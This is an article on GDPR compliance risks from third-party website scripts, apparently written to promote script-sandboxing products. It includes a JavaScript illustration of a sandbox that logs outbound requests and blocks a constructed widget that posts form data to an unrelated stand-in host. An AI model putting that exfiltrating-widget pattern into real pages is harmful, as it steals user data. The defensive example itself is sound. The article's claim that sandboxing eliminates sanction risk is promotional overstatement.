Preparing for GDPR: Pay Attention to Third Party Services

Data privacy died a long time ago: even big-data collectors that “anonymize” information know everything that they need in order to sell us goods and services in a very direct and targeted manner.

The new General Data Protection Regulation (GDPR) rules will require companies to ensure that data is safe, secure and under the control of the persons or organizations it belongs to. Unfortunately, many firms aren't ready for GDPR, and most don't even know what it's all about.

A June 2017 poll by Spiceworks found that only 9% of US firms were even aware of what the GDPR was all about, and how it will affect their company. As far as being ready for GDPR, only 2% of IT professionals in the US believe that their firm is fully prepared to meet the requirements, while only 5% have even begun preparing. In EU countries 28% said they were in the process of preparing, while only 2% were fully prepared.

Even those firms that are fully prepared are unlikely to be ready to meet perhaps the biggest GDPR challenge: how to ensure that the firms they partner with follow the rules, lest they suffer the consequences the regulations impose.

While many countries (in Europe and elsewhere) have in the past issued guidelines on promoting privacy and data security on the internet, GDPR is the first one to have actual teeth – as in sanctions, penalties, and fines for violators. Among the regulations GDPR imposes on data firms is enabling users to be in control of their data – giving them the right to move their accounts (and all its information) between different firms, or to have it erased altogether.

Companies that want to collect data must obtain specific permission from users, and in addition, companies must institute strong security measures, appoint a data protection officer who will be in charge of policy, and inform users within 72 hours of a data breach so they can take steps to protect themselves (change passwords, etc.). Companies that fail to follow the rules could find themselves facing hefty fines – as much as 4% of total annual turnover, or 20 million euros (whichever is bigger).

Perhaps most significantly, the GDPR rules apply not only to companies located inside the EU, but to any firm anywhere that interacts with EU citizens. As a result, companies have been scrambling to prepare to comply with the GDPR, which comes into effect in May 2018. In a world of data that has never really known borders before, the data companies are working hard to fit into the new paradigm the EU is imposing.

For customer-facing organizations like banks, publishers, insurance companies, etc., this could be a huge problem; according to GDPR rules, the buck (or the euro, in this case) stops with the site that the customer engages with directly – and if any of that site's partners violate GDPR rules, the direct-connect site is still to be considered responsible.

Thus, if a bank site uses a third-party service to run a connection to social media sites, the bank needs to make sure that the partner supplying that script is aware of, and observes, the GDPR rules; if it does not and data is lost, stolen, or shipped out of EU countries without permission of the customer who provided that data, the EU could slap the bank with a large fine.

The problem is a huge one: the internet as we know it is dependent on the use of these third-party scripts. From chat to ads to social media and beyond, many of the services websites use to do business today are not provided by them, but by third parties. The worst part is that firms have no way to easily ascertain if their partners are compliant; a bank's designated data protection officer won't know if it is safe and secure, or if there is a backdoor hackers can use to steal data – or even if the partner is observing GDPR rules by storing data in EU-based servers. The wages of ignorance in this case are likely to be sanctions – which, as we have seen, can be substantial.

How can companies defend themselves, and their bottom lines, under these circumstances? One possibility is to use commercially available dynamic protective layers for websites that examine a script's activity in a protected area. This resembles a sandbox but goes further: a conventional sandbox can report on what happens inside it, not on which sites the script connects to beyond it, yet those outbound connections are exactly what needs examining to understand a script's effects. The system “arrests” (halts and evaluates) the script in order to see what it does before it is loaded onto a live page.

If the script appears to be attempting an exploit – for example, communicating with a server that does not appear to be associated with the service the script purports to perform, or copying keystrokes or user information – the security system can prevent the script from executing on the web page, with the site ignoring its connections. The user and the site are thus protected from non-compliant or malicious scripts, eliminating the threat of GDPR sanctions.
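As an added illustration (not code from the article, and not any vendor's product), here is a minimal model of the “arrest and evaluate” step in JavaScript: a stand-in third-party script runs against a recording fetch, the hosts it contacts are logged, and an egress policy for the service the script claims to provide decides whether it may load on the live page. The policy, the host names and the host-to-region table are all constructed for the example.

```javascript
// Hypothetical egress policy for a social-sharing widget: the hosts it legitimately
// needs (the listed host and its subdomains) and the regions its data may land in.
const servicePolicies = {
  'social-share-widget': { allowedHosts: ['example-social.test'], allowedRegions: ['EU'] },
};
// Constructed host-to-region lookup, standing in for a real geolocation source.
const regionTable = { 'widgets.example-social.test': 'EU', 'cdn.example-social.test': 'EU',
                      'collector.unrelated.test': 'US' };
const regionOf = (host) => regionTable[host] || 'UNKNOWN';
// fetch replacement handed to the script under evaluation: records what the script
// tries to send (host, method, body size) and lets nothing leave the sandbox.
function recordingFetch(log) {
  return (url, init = {}) => {
    const u = new URL(url);
    const body = init.body ? String(init.body) : '';
    log.push({ host: u.hostname, region: regionOf(u.hostname),
               method: init.method || 'GET', bytesOut: body.length });
    return Promise.resolve({ ok: true, status: 204 });
  };
}
const hostAllowed = (host, allowed) => allowed.some(a => host === a || host.endsWith('.' + a));
// Compare the recorded requests with the policy for the service the script claims to be.
function evaluateScript(scriptId, log, policies = servicePolicies) {
  const policy = policies[scriptId];
  if (!policy) return { decision: 'block', reasons: ['no policy registered for script'] };
  const reasons = [];
  for (const r of log) {
    if (!hostAllowed(r.host, policy.allowedHosts)) {
      reasons.push(`unexpected host ${r.host} (${r.method}, ${r.bytesOut} bytes out)`);
    } else if (!policy.allowedRegions.includes(r.region)) {
      reasons.push(`${r.host} is served from ${r.region}, outside the allowed regions`);
    }
  }
  return { decision: reasons.length ? 'block' : 'allow', reasons };
}
// Constructed stand-in for a third-party script: it does its job, then also posts
// form data to a host unrelated to the social-sharing service it is supposed to provide.
function suspectWidget(fetch) {
  fetch('https://widgets.example-social.test/share.js');
  fetch('https://cdn.example-social.test/icons.svg');
  fetch('https://collector.unrelated.test/c', { method: 'POST', body: 'form=...' });
}
// Run the script against the recording fetch and decide before it reaches the live page.
function runEvaluation(scriptId, script) {
  const log = [];
  script(recordingFetch(log));
  return evaluateScript(scriptId, log);
}
console.log(runEvaluation('social-share-widget', suspectWidget));
```

A real deployment would record every egress path a script can use (XMLHttpRequest, beacons, image and script loads, WebSockets), not only fetch, and would source the region data from a maintained lookup rather than a constant table.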

Here then is a way for companies to prepare for what may be the biggest change in the way they are required to handle data, perhaps ever. In a way, the GDPR is providing an invaluable service for site administrators; chances are that many of them never considered that their trusted partners could jeopardize their cybersecurity.

With the new regulations, companies are going to have to look into exactly what the third-party scripts they host are actually doing - saving them from potential losses, lawsuits, and loss of reputation.
